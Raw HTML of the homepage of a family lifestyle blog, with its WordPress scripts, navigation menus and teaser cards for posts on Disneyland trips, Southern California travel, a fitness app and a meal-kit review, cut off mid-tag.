type='text/javascript'> /* <![CDATA[ */ var wpp = {"exit_alert_text":"I need you to see something - stay on this page"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/plugins/m-wp-popup/js/wpp-popup-frontend.js?ver=1.0'></script> <script type='text/javascript' async="async" data-noptimize="1" data-cfasync="false" src='//scripts.mediavine.com/tags/mom-rewritten.js?ver=5.2'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/themes/restored316-tasteful/js/global.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/plugins/simple-social-icons/svgxuse.js?ver=1.1.21'></script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/plugins/youtube-video-player/fornt_end/scripts/youtube_embed_front_end.js?ver=5.2'></script> <script type='text/javascript' src='https://www.youtube.com/iframe_api?ver=5.2'></script> <link rel='https://api.w.org/' href='https://www.momrewritten.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.momrewritten.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.momrewritten.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <style type="text/css"> .enews .screenread { height: 1px; left: -1000em; overflow: hidden; position: absolute; top: -1000em; width: 1px; } </style><script type='text/javascript' data-cfasync='false'>var _mmunch = {'front': false, 'page': false, 'post': false, 'category': false, 'author': false, 'search': false, 'attachment': false, 'tag': false};_mmunch['front'] = true;</script><script data-cfasync="false" src="//a.mailmunch.co/app/v1/site.js" id="mailmunch-script" data-plugin="mc_mm" data-mailmunch-site-id="322093" async></script> <style> :root { --mv-create-radius: 0; } </style> <link rel="pingback" href="https://www.momrewritten.com/xmlrpc.php" /> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-102367622-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-102367622-1'); </script><style type="text/css">.site-title a { background: url(https://momrewritten.com/wp-content/uploads/2018/09/Mom-Rewritten-Blog-Logo-300x169.jpg) no-repeat !important; }</style> <link rel="me" href="https://twitter.com/momrewritten"><meta name="twitter:widgets:link-color" content="#000000"><meta name="twitter:widgets:border-color" content="#000000"><meta name="twitter:partner" content="tfwp"><link rel="icon" href="https://www.momrewritten.com/wp-content/uploads/2017/07/cropped-Mom-Rewritten-Favicon-1-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.momrewritten.com/wp-content/uploads/2017/07/cropped-Mom-Rewritten-Favicon-1-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.momrewritten.com/wp-content/uploads/2017/07/cropped-Mom-Rewritten-Favicon-1-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.momrewritten.com/wp-content/uploads/2017/07/cropped-Mom-Rewritten-Favicon-1-270x270.png" /> <meta name="twitter:card" content="summary"><meta name="twitter:title" content="Mom Rewritten"><meta name="twitter:site" content="@momrewritten"><meta name="twitter:description" content="Lifestyle blog about simple living, positive parenting, Disney and family travel."> <style type="text/css" id="wp-custom-css"> .entry-content { font-size: 19px; line-height: 1.8; color: #000; } .entry-title, .entry-title a, .sidebar .widget-title a, .entry-content h2, .entry-content h3, .entry-content h4, .entry-content h5, .entry-content h6 { color: #f9774f; } .mobile-area { padding: 10px; display: block; } .widget-above-header{ background-image:none; background-color:#f8f8f8; display:none; } .widget-above-header .top-icon{ margin:0px; padding:0px; text-align:right; } .widget-above-header .top-icon li{ list-style:none; display:inline-block; padding:0px 0px; margin-bottom:0px; line-height:18px; } .widget-above-header .top-icon li a{ font-size:17px; color:#f8f8f8; } .widget-above-header .top-icon li a i{ padding:5px 4px 5px 10px; background-color:#f8f8f8; color:#175b6e; border-left:1px solid #ccc; } .widget-above-header .wrap{ width:1280px; padding:0px; } .widget-above-header .wrap .widget{ padding:0px; } /*** top header ***/ .site-header .title-area .site-description{ display:none; } .site-container{ padding:0px; } .site-header .title-area .site-title a{ width:216px; min-height:110px; } .site-header .widget_nav_menu{ margin-top:36px; } /*** top header ***/ /*** home ***/ .type-post .read-more .more-link{ text-transform:uppercase; font-size:14px; letter-spacing:1px; font-weight:400; } .home-top .more-from-category a{ font-size:14px; padding:10px 0px; width:100%; border-radius:4px; } .home-bottom .more-from-category a{ font-size:14px; padding:4px 26px; } .home-middle-right .type-post .entry-title{ font-size:17px; } .home-middle-right .type-post p{ line-height:22px; margin-bottom:18px; } .sidebar .user-profile .avatar{ display:none; } @media only screen and (min-width: 768px) { .mobile-area { display: none; } } ul li.ssi-facebook a { background-color: #f9774f !important; } ul li.ssi-gplus a { background-color: #9ddadd !important; } ul li.ssi-instagram a { background-color: #eb5e55 !important; } ul li.ssi-pinterest a { background-color: #81deef !important; } ul li.ssi-twitter a { background-color: #f29db2 !important; } </style> </head> <body class="home blog custom-header header-image content-sidebar tasteful-home"><nav class="nav-secondary" aria-label="Secondary"><div class="wrap"><ul id="menu-menu-for-mom-rewritten" class="menu genesis-nav-menu menu-secondary"><li id="menu-item-8104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8104"><a href="https://www.momrewritten.com/mom-life-momrewritten/"><span >Mom Life</span></a> <ul class="sub-menu"> <li id="menu-item-8108" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8108"><a href="https://www.momrewritten.com/mom-life-momrewritten/little-changes-big-difference-momrewritten/"><span >Little Changes for a Big Difference</span></a></li> <li id="menu-item-8106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8106"><a href="https://www.momrewritten.com/mom-life-momrewritten/positive-parenting-momrewritten/"><span >Positive Parenting</span></a></li> <li id="menu-item-8105" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8105"><a href="https://www.momrewritten.com/mom-life-momrewritten/projects-crafts-momrewritten/"><span >Projects and Crafts for Mom</span></a></li> </ul> </li> <li id="menu-item-8099" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8099"><a href="https://www.momrewritten.com/kid-life-momrewritten/"><span >Kid Life</span></a> <ul class="sub-menu"> <li id="menu-item-8102" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8102"><a href="https://www.momrewritten.com/kid-life-momrewritten/kids-love-momrewritten/"><span >Things Kids Love</span></a></li> <li id="menu-item-8101" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8101"><a href="https://www.momrewritten.com/kid-life-momrewritten/crafts-activities-kids-momrewritten/"><span >Crafts and Activities for Kids</span></a></li> <li id="menu-item-8100" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8100"><a href="https://www.momrewritten.com/kid-life-momrewritten/parties-fun-momrewritten/"><span >Parties and Fun Stuff</span></a></li> </ul> </li> <li id="menu-item-875" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-875"><a href="https://www.momrewritten.com/disney/"><span >Disney</span></a> <ul class="sub-menu"> <li id="menu-item-197" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-197"><a href="https://www.momrewritten.com/disney/disneyland-tips-tricks/"><span >Disney &#8211; Tips &#038; Tricks</span></a></li> <li id="menu-item-877" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-877"><a href="https://www.momrewritten.com/disney/disneyland-food-dining/"><span >Disney &#8211; Food &#038; Dining</span></a></li> <li id="menu-item-878" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-878"><a href="https://www.momrewritten.com/disney/disneyland-resort-hotels/"><span >Disney &#8211; Resort Hotels</span></a></li> <li id="menu-item-194" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-194"><a href="https://www.momrewritten.com/disney/disneyland-holidays/"><span >Disney &#8211; Holidays</span></a> <ul class="sub-menu"> <li id="menu-item-880" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-880"><a href="https://www.momrewritten.com/disney/disneyland-holidays/halloweentime-at-disneyland/"><span >Halloweentime at Disney</span></a></li> <li id="menu-item-879" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-879"><a href="https://www.momrewritten.com/disney/disneyland-holidays/christmas-at-disneyland/"><span >Christmas at Disney</span></a></li> <li id="menu-item-196" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-196"><a href="https://www.momrewritten.com/disney/disneyland-special-needs/"><span >Disneyland &#8211; Special needs</span></a></li> </ul> </li> </ul> </li> <li id="menu-item-355" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-355"><a href="https://www.momrewritten.com/this-life/"><span >This Life</span></a> <ul class="sub-menu"> <li id="menu-item-8115" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8115"><a href="https://www.momrewritten.com/this-life/living-simply-momrewritten/"><span >Good Health</span></a></li> <li id="menu-item-8318" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8318"><a href="https://www.momrewritten.com/this-life/recipes-and-eating/"><span >Recipes and Eating</span></a></li> </ul> </li> <li id="menu-item-8109" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8109"><a href="https://www.momrewritten.com/travel-momrewritten/"><span >Travel</span></a> <ul class="sub-menu"> <li id="menu-item-8111" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8111"><a href="https://www.momrewritten.com/travel-momrewritten/southern-california-travel-momrewritten/"><span >SoCal Destinations</span></a></li> <li id="menu-item-8113" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8113"><a href="https://www.momrewritten.com/travel-momrewritten/family-travel-momrewritten/"><span >Family Travel</span></a></li> </ul> </li> <li class="right search"><form class="search-form" method="get" action="https://www.momrewritten.com/" role="search"><input class="search-form-input" type="search" name="s" id="searchform-5cdd6ed3e54ec2.35813009" placeholder="Looking for something?"><input class="search-form-submit" type="submit" value="Search"><meta content="https://www.momrewritten.com/?s={s}"></form></li></ul></div></nav><div class="site-container"><header class="site-header"><div class="wrap"><div class="title-area"><h1 class="site-title"><a href="https://www.momrewritten.com/">Mom Rewritten</a></h1><p class="site-description">Lifestyle blog about simple living, positive parenting, Disney and family travel.</p></div><div class="widget-area header-widget-area"><section id="nav_menu-2" class="widget widget_nav_menu"><div class="widget-wrap"><nav class="nav-header"><ul id="menu-header-menu" class="menu genesis-nav-menu"><li id="menu-item-12019" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12019"><a href="http://momrewritten.com/"><span >Home</span></a></li> <li id="menu-item-12020" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-12020"><a href="https://www.momrewritten.com/about/"><span >Meet Julie</span></a> <ul class="sub-menu"> <li id="menu-item-12021" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12021"><a href="https://www.momrewritten.com/about/disclosure/"><span >Disclosure</span></a></li> </ul> </li> <li id="menu-item-12022" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12022"><a href="https://www.momrewritten.com/media-kit/"><span >Media Kit</span></a></li> <li id="menu-item-12023" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12023"><a href="https://www.momrewritten.com/privacy-policy/"><span >Privacy Policy &#038; Disclosures</span></a></li> </ul></nav></div></section> </div></div></header><div class="mobile-area"><section id="search-5" class="widget widget_search"><div class="widget-wrap"><form class="search-form" method="get" action="https://www.momrewritten.com/" role="search"><input class="search-form-input" type="search" name="s" id="searchform-5cdd6ed3e651e2.74858580" placeholder="Looking for something?"><input class="search-form-submit" type="submit" value="Search"><meta content="https://www.momrewritten.com/?s={s}"></form></div></section> </div><div class="site-inner"><div class="content-sidebar-wrap"><main class="content"><div class="home-top widget-area"><section id="featured-post-2" class="widget featured-content featuredpost"><div class="widget-wrap"><article class="post-7361 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks tag-budget tag-disney-with-kids tag-disneyland-3 tag-splurges entry"><a href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/" class="aligncenter" aria-hidden="true" tabindex="-1"><img width="600" height="417" src="https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears.jpg" class="entry-image attachment-post" alt="Disneyland Splurges for Kids (and Money-Saving Splurges You MUST make!)" srcset="https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears.jpg 600w, https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears-300x209.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/">Disneyland Splurges for Kids (and Where to Cut Costs)</a></h2><p class="entry-meta"><time class="entry-time" datetime="2019-05-06T13:00:24-07:00">May 6, 2019</time> By <span class="entry-author"><a href="https://www.momrewritten.com/author/juliebigboy/" class="entry-author-link" rel="author"><span class="entry-author-name">Julie Bigboy</span></a></span> <span class="entry-comments-link"><a href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/#comments">6 Comments</a></span></p></header><div class="entry-content"><p>Disneyland splurges can really add a certain magic to your vacation. From tiny sweets to full-blown boutique make-overs, there's a Disneyland splurge for kids of all ages (and every budget)! With four kids in our family we don't tend to go "all out" but it certainly adds joy to our trip to surprise the kids with a few little splurges. I have some suggestions of&nbsp;Disneyland splurges for kids, plus some money saving ideas that still allow for special treats! Disneyland Splurges for Kids Yes, Disneyland is already a magical place. Throwing in a few splurges here and there on your trip ... <div class="read-more"><a class="more-link" href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/">read more...</a></div></p></div></article></div></section> </div><div class="home-middle"><div class="home-middle-left widget-area"><section id="featured-post-3" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">Recent Posts</h4> <article class="post-3506 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks tag-california-adventure tag-crowd tag-disneyland-3 entry"><a href="https://www.momrewritten.com/crowdeddisneyland/" class="aligncenter" aria-hidden="true" tabindex="-1"><img width="370" height="220" src="https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-370x220.jpg" class="entry-image attachment-post" alt="" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/crowdeddisneyland/">Crowded Disneyland Day? Top Tips on What to Do!</a></h2></header><div class="entry-content"><p>Disney Parks are very popular destinations. And that means more often than not it's going to be crowded at Disneyland! Even the "off-season" can be crowded with guests. In fact, there doesn't even seem to be an off-season at this popular California destination anymore! Sometimes you can't help ... <div class="read-more"><a class="more-link" href="https://www.momrewritten.com/crowdeddisneyland/">read more...</a></div></p></div></article></div></section> </div><div class="home-middle-right widget-area"><section id="featured-post-4" class="widget featured-content featuredpost"><div class="widget-wrap"><article class="post-13449 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-food-dining tag-disney-springs tag-disney-world tag-irish-pub tag-raglan-road entry"><a href="https://www.momrewritten.com/disney-springs-raglan-road-irish-pub-brunch/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-150x150.jpg" class="entry-image attachment-post" alt="Raglan Road Irish dance lessons for kids" srcset="https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-125x125.jpg 125w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-200x200.jpg 200w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-320x320.jpg 320w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-480x480.jpg 480w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-720x720.jpg 720w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/disney-springs-raglan-road-irish-pub-brunch/">Disney Springs Raglan Road Irish Pub Brunch with Kids</a></h2></header></article><article class="post-13350 post type-post status-publish format-standard has-post-thumbnail category-little-changes-big-difference-momrewritten category-mom-life-momrewritten tag-exercise tag-fitness tag-health entry"><a href="https://www.momrewritten.com/gixo-review-fitness-app/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-150x150.jpg" class="entry-image attachment-post" alt="Busy parents looking for at-home workouts should consider this budget-friendly smart phone app. Read this beginner&#039;s guide to using Gixo for both on demand and live exercise classes with a coach, the pros and cons of the fitness app and who would benefit the most. Find out which classes are offered including HIIT, yoga, 5K &amp; 10K marathon training and more." srcset="https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-125x125.jpg 125w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-200x200.jpg 200w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-320x320.jpg 320w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-480x480.jpg 480w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-720x720.jpg 720w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/gixo-review-fitness-app/">Gixo Beginner&#8217;s Guide &#8211; Is Gixo the Best Workout App for Busy Moms?</a></h2></header></article><article class="post-13210 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-food-dining entry"><a href="https://www.momrewritten.com/disney-california-food-and-wine-festival-with-toddlers-and-preschoolers/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2019/03/food-and-wine-candy-drink-2-1-e1553209313772-150x150.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2019/03/food-and-wine-candy-drink-2-1-e1553209313772-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2019/03/food-and-wine-candy-drink-2-1-e1553209313772-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2019/03/food-and-wine-candy-drink-2-1-e1553209313772-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2019/03/food-and-wine-candy-drink-2-1-e1553209313772-125x125.jpg 125w, https://www.momrewritten.com/wp-content/uploads/2019/03/food-and-wine-candy-drink-2-1-e1553209313772-200x200.jpg 200w, https://www.momrewritten.com/wp-content/uploads/2019/03/food-and-wine-candy-drink-2-1-e1553209313772-320x320.jpg 320w, https://www.momrewritten.com/wp-content/uploads/2019/03/food-and-wine-candy-drink-2-1-e1553209313772-480x480.jpg 480w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/disney-california-food-and-wine-festival-with-toddlers-and-preschoolers/">Disneyland California Food and Wine Festival with Toddlers and Preschoolers</a></h2></header></article><article class="post-12762 post type-post status-publish format-standard has-post-thumbnail category-little-changes-big-difference-momrewritten category-mom-life-momrewritten category-uncategorized entry"><a href="https://www.momrewritten.com/confidence-boosters-reason-to-smile/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-150x150.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-125x125.jpg 125w, https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-200x200.jpg 200w, https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-320x320.jpg 320w, https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-480x480.jpg 480w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/confidence-boosters-reason-to-smile/">Confidence Boosters Give Me a Reason to Smile</a></h2></header></article></div></section> </div></div><div class="home-bottom"><div class="home-bottom widget-area"><section id="featured-post-5" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">FAMILY TRAVEL</h4> <article class="post-12526 post type-post status-publish format-standard has-post-thumbnail category-southern-california-travel-momrewritten category-travel-momrewritten category-uncategorized entry"><a href="https://www.momrewritten.com/universal-studios-hollywood-tips/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="300" height="225" src="https://www.momrewritten.com/wp-content/uploads/2019/02/Universal-Studios-night-sign-300x225.jpg" class="entry-image attachment-post" alt="Planning a Southern California vacation and wondering if a day at Universal Studios Hollywood would be fun for the entire family? This deep guide shares Universal Studios Hollywood tips including discount tickets, thrill rides &amp; motion sickness, whether the park is good for little kids, child-swap feature, The Wizarding World of Harry Potter and ideas on maximizing your day." srcset="https://www.momrewritten.com/wp-content/uploads/2019/02/Universal-Studios-night-sign-300x225.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2019/02/Universal-Studios-night-sign-768x576.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2019/02/Universal-Studios-night-sign.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/universal-studios-hollywood-tips/">Universal Studios Hollywood Tips for First Time Visitors</a></h2></header></article><article class="post-12123 post type-post status-publish format-standard has-post-thumbnail category-southern-california-travel-momrewritten category-travel-momrewritten entry"><a href="https://www.momrewritten.com/san-diego-zoo-safari-park-with-kids/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="300" height="213" src="https://www.momrewritten.com/wp-content/uploads/2018/10/Safari-park-statue-300x213.jpg" class="entry-image attachment-post" alt="Visiting the San Diego Zoo Safari Park with kids? Read this ultimate guide on what to do and see, what&#039;s new at the Safari Park, how to navigate and where to purchase discounted tickets for the San Diego Zoo Safari Park." srcset="https://www.momrewritten.com/wp-content/uploads/2018/10/Safari-park-statue-300x213.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2018/10/Safari-park-statue-768x545.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2018/10/Safari-park-statue.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/san-diego-zoo-safari-park-with-kids/">SoCal Guide &#8211; San Diego Zoo Safari Park with Kids</a></h2></header></article><article class="post-6808 post type-post status-publish format-standard has-post-thumbnail category-southern-california-travel-momrewritten category-travel-momrewritten entry"><a href="https://www.momrewritten.com/legoland-california-resort-sweetens-its-annual-brick-or-treat-party-nights-halloween-celebration/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="300" height="184" src="https://www.momrewritten.com/wp-content/uploads/2016/10/BrickorTreat5-300x184.jpg" class="entry-image attachment-post" alt="LEGOLAND® California Resort Brick-or-Treat Party Nights Halloween Celebration" srcset="https://www.momrewritten.com/wp-content/uploads/2016/10/BrickorTreat5-300x184.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2016/10/BrickorTreat5-1030x630.jpg 1030w, https://www.momrewritten.com/wp-content/uploads/2016/10/BrickorTreat5-768x470.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2016/10/BrickorTreat5-600x367.jpg 600w, https://www.momrewritten.com/wp-content/uploads/2016/10/BrickorTreat5.jpg 1067w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/legoland-california-resort-sweetens-its-annual-brick-or-treat-party-nights-halloween-celebration/">Guide to LEGOLAND Halloween California Brick-or-Treat Party Nights</a></h2></header></article><p class="more-from-category"><a href="https://www.momrewritten.com/travel-momrewritten/" title="Travel">More posts from family travel</a></p></div></section> <section id="featured-post-6" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">DISNEY</h4> <article class="post-7361 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks tag-budget tag-disney-with-kids tag-disneyland-3 tag-splurges entry"><a href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="209" src="https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears-300x209.jpg" class="entry-image attachment-post" alt="Disneyland Splurges for Kids (and Money-Saving Splurges You MUST make!)" srcset="https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears-300x209.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears.jpg 600w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/">Disneyland Splurges for Kids (and Where to Cut Costs)</a></h2></header></article><article class="post-3506 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks tag-california-adventure tag-crowd tag-disneyland-3 entry"><a href="https://www.momrewritten.com/crowdeddisneyland/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="200" src="https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-300x200.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-300x200.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-768x512.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-735x490.jpg 735w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/crowdeddisneyland/">Crowded Disneyland Day? Top Tips on What to Do!</a></h2></header></article><article class="post-13449 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-food-dining tag-disney-springs tag-disney-world tag-irish-pub tag-raglan-road entry"><a href="https://www.momrewritten.com/disney-springs-raglan-road-irish-pub-brunch/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="253" src="https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-300x253.jpg" class="entry-image attachment-post" alt="Raglan Road Irish dance lessons for kids" srcset="https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-300x253.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-768x648.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile-735x620.jpg 735w, https://www.momrewritten.com/wp-content/uploads/2019/05/raglan-road-dance-lesson-smile.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/disney-springs-raglan-road-irish-pub-brunch/">Disney Springs Raglan Road Irish Pub Brunch with Kids</a></h2></header></article><p class="more-from-category"><a href="https://www.momrewritten.com/disney/" title="Disney">More posts from Disney</a></p></div></section> <section id="featured-post-7" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">THIS LIFE</h4> <article class="post-9713 post type-post status-publish format-standard has-post-thumbnail category-featured category-recipes-and-eating category-this-life category-uncategorized entry"><a href="https://www.momrewritten.com/dinnerly-review-meal-subscription/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="200" src="https://www.momrewritten.com/wp-content/uploads/2017/12/moo-shu-tacos-300x200.jpg" class="entry-image attachment-post" alt="Considering a meal subscription services? My honest Dinnerly review shares if cost and time savings is worth it. Review of Dinnerly includes list of pros and cons, including taste review." srcset="https://www.momrewritten.com/wp-content/uploads/2017/12/moo-shu-tacos-300x200.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2017/12/moo-shu-tacos-768x512.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2017/12/moo-shu-tacos-705x470.jpg 705w, https://www.momrewritten.com/wp-content/uploads/2017/12/moo-shu-tacos-450x300.jpg 450w, https://www.momrewritten.com/wp-content/uploads/2017/12/moo-shu-tacos.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/dinnerly-review-meal-subscription/">Dinnerly Review &#8211; Honest Review of Dinnerly Meal Subscription</a></h2></header></article><article class="post-12534 post type-post status-publish format-standard has-post-thumbnail category-living-simply-momrewritten category-this-life category-uncategorized entry"><a href="https://www.momrewritten.com/sick-day-activities-for-adults/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="200" src="https://www.momrewritten.com/wp-content/uploads/2019/01/IMG_5987-300x200.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2019/01/IMG_5987-300x200.jpg 300w, 